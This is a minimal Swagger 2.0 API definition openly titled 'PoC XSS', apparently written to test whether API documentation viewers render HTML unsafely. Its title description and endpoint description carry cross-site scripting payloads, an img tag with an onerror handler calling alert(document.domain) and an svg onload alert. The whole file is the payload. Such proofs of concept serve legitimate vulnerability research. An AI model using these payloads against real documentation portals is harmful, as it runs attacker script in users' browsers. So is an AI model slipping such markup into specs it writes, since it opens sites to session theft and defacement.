swagger: '2.0'
info:
  title: 'PoC XSS'
  description: '<img src=x onerror=alert(document.domain)>'
  version: '1.0'
basePath: /api/
paths:
  /test:
    get:
      summary: 'Test'
      description: '<svg onload=alert(1)>'
      responses:
        '200':
          description: 'ok'
